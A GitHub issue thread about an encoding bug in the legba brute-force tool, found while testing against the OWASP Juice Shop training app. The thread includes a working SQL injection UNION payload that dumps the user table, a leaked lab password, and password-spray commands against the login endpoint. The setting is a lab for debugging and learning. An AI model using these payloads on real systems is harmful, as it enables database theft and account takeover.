### ISSUE TITLE
http encoding issue

### ISSUE THREAD

**Issue by niqdev** [evilsocket/legba#24]
Hi, thanks for the awesome project!

I'm testing `legba` with my [hckops/hckctl](https://github.com/hckops/hckctl) tool against the owasp juice shop and it looks like something is wrong with the encoding or escaping of special chars, could you please verify?

This is how I found the issue
```bash
# starts juice-shop
hckctl box start vulnerable/owasp-juice-shop

# generates users.txt
curl -sS -H "Accept: application/json" "http://juiceshop:3000/rest/products/search?q=foo%'))+UNION+SELECT+id,username,email,password,role,deluxeToken,totpSecret,isActive,createdAt+FROM+Users;--" | \
  jq -r '.data[].description' > /hck/share/users.txt

cat /hck/share/users.txt
admin@juice-sh.op # <<<<<<<<<< user with password admin123
jim@juice-sh.op
bender@juice-sh.op
bjoern.kimminich@gmail.com
ciso@juice-sh.op
support@juice-sh.op
morty@juice-sh.op
mc.safesearch@juice-sh.op
J12934@juice-sh.op # <<<<<<<<<< user with password 0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB
wurstbrot@juice-sh.op
amy@juice-sh.op
bjoern@juice-sh.op
bjoern@owasp.org
chris.pike@juice-sh.op
accountant@juice-sh.op
uvogin@juice-sh.op
demo
john@juice-sh.op
emma@juice-sh.op
stan@juice-sh.op
ethereum@juice-sh.op
a@a.com

# password not found
hckctl task legba --inline -- legba http \
  --target http://box-owasp-juice-shop-<RANDOM>:3000/rest/user/login \
  --username /hck/share/users.txt \
  --password '0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB' \
  --http-method POST \
  --http-payload 'email={USERNAME}&password={PASSWORD}'
```

Official solution https://help.owasp-juice.shop/appendix/solutions.html, search for `Dumpster dive the Internet for a leaked password and log in to the original user account it belongs to` or the password

In order to exclude that it's an issue with my tool, I built the project locally and this is how I verify it
```bash
# password spray with admin123
RUST_LOG=debug ./target/release/legba http \
  --target http://localhost:3000/rest/user/login \
  --username ${HOME}/.local/state/hck/share/users.txt \
  --password 'admin123' \
  --http-method POST \
  --http-payload 'email={USERNAME}&password={PASSWORD}'
# prints
# [INFO ] [2023-11-08 09:58:03] (http) <http://localhost:3000/rest/user/login> username=admin@juice-sh.op password=admin123

# password spray with 0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB
RUST_LOG=debug ./target/release/legba http \
  --target http://localhost:3000/rest/user/login \
  --username ${HOME}/.local/state/hck/share/users.txt \
  --password '0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB' \
  --http-method POST \
  --http-payload 'email={USERNAME}&password={PASSWORD}'
# not found

# I can confirm that the password is valid and solve the challenge with
http http://localhost:3000/rest/user/login email="J12934@juice-sh.op" password='0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB'
{
    "authentication": {
        "bid": 6,
        "token": "<REDACTED>",
        "umail": "J12934@juice-sh.op"
    }
}
```
I wanted to actually debug it properly, and probably it's because I'm not familiar with rust, I can build `legba` disabling the `mqtt` plugin, but when i'm trying to run it (same error with vscode, intellij, rustrover) I keep getting
```bash
thread 'main' panicked at <REDACTED>.cargo/registry/src/index.crates.io-6f17d22bba15001f/clap_builder-4.4.7/src/builder/debug_asserts.rs:275:9:
Command legba: Argument group name must be unique

        'Options' is already in use
stack backtrace:
   0: rust_begin_unwind
             at /rustc/cc66ad468955717ab92600c770da8c1601a4ff33/library/std/src/panicking.rs:595:5
```
Could you please verify it? I'm more than happy to contribute to the project and open a pr if this is an actual issue.
Thanks!

**Comment by evilsocket** [comment]
Hi, I think you're missing a couple of things :) 

It looks like the payload should be `{"email": "{USERNAME}", "password": "{PASSWORD}"}`:

![Screenshot 2023-11-08 alle 12 40 30](https://github.com/evilsocket/legba/assets/86922/6f898971-7b2d-47af-9b88-13057e2c6045)

And because of it, a content type header must be added ... this command line works for me:

```
legba http \
    -T http://localhost:3000/rest/user/login \
    -U J12934@juice-sh.op \
    -P '0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB' \
    --http-method POST \
    --http-payload '{"email": "{USERNAME}", "password": "{PASSWORD}"}' \
    --http-headers "Content-Type=application/json"
```

![Screenshot 2023-11-08 alle 12 42 02](https://github.com/evilsocket/legba/assets/86922/8612e3e6-7abd-4671-9859-cf84e14376f6)


Am I missing something?

**Comment by evilsocket** [comment]
Yep, can confirm that's also what httpie is sending (it seems it encodes data to json by default if no content-type is provided):

![Screenshot 2023-11-08 alle 12 48 17](https://github.com/evilsocket/legba/assets/86922/09529fc8-6a55-4be9-92e9-63d3e2d3145e)

**Comment by niqdev** [comment]
Thanks for taking the time and look into this, I appreciate your feedback! What probably put me off track is that the `admin123` was working 🤷🏻‍♂️

**Comment by evilsocket** [comment]
that's interesting actually ... will try to see why

**Comment by evilsocket** [comment]
just cargo build --release ... maybe you're missing cmake (that's what's required to build paho-mqtt-sys if i recall correctly)

**Comment by evilsocket** [comment]
AH! turns out you were 100% correct! That password does indeed break the request because not correctly encoded (while admin123 works because doesn't contain special chars):

![Screenshot 2023-11-08 alle 13 13 52](https://github.com/evilsocket/legba/assets/86922/fb7ef592-632b-4d37-8961-1c3ff693f843)

Apparently the page accepts both JSON and normal payload ... my bad man! Will fix ASAP :D thanks for reporting

**Comment by evilsocket** [comment]
(in the meantime the json approach is a decent workaround)

**Comment by evilsocket** [comment]
pushed the fix, it now works as expected, thanks for reporting!

![Screenshot 2023-11-08 alle 13 40 53](https://github.com/evilsocket/legba/assets/86922/36e43224-b714-475f-b8af-5324c42129b3)

**Comment by evilsocket** [comment]
let me know if i can do anything else to help you integrate with your tool

**Comment by niqdev** [comment]
Thanks! It's still early stage and I'm trying to validate few ideas atm, when i'll get a chance I'd like to see how `legba` performs on a remote kube cluster with a "real" wordlist...

The idea is basically to abstract where a tool is running and how, to focus on the actual problem. This [megalopolis/task/bruteforce/legba](https://github.com/hckops/megalopolis/blob/main/task/bruteforce/legba.yml) is how I defined your tool. I want to build a preset of commands for each tool and the most common use cases. Once I build a solid catalog and i'm familiar with all the tools and attacks i will focus on the orchestration and how to collect/parse/aggregate the results from various tools (which is the easiest part for me)

If you are interested I could add it as alternative way to run it in the installation section or an example page in the wiki to showcase legba. It's up to you!
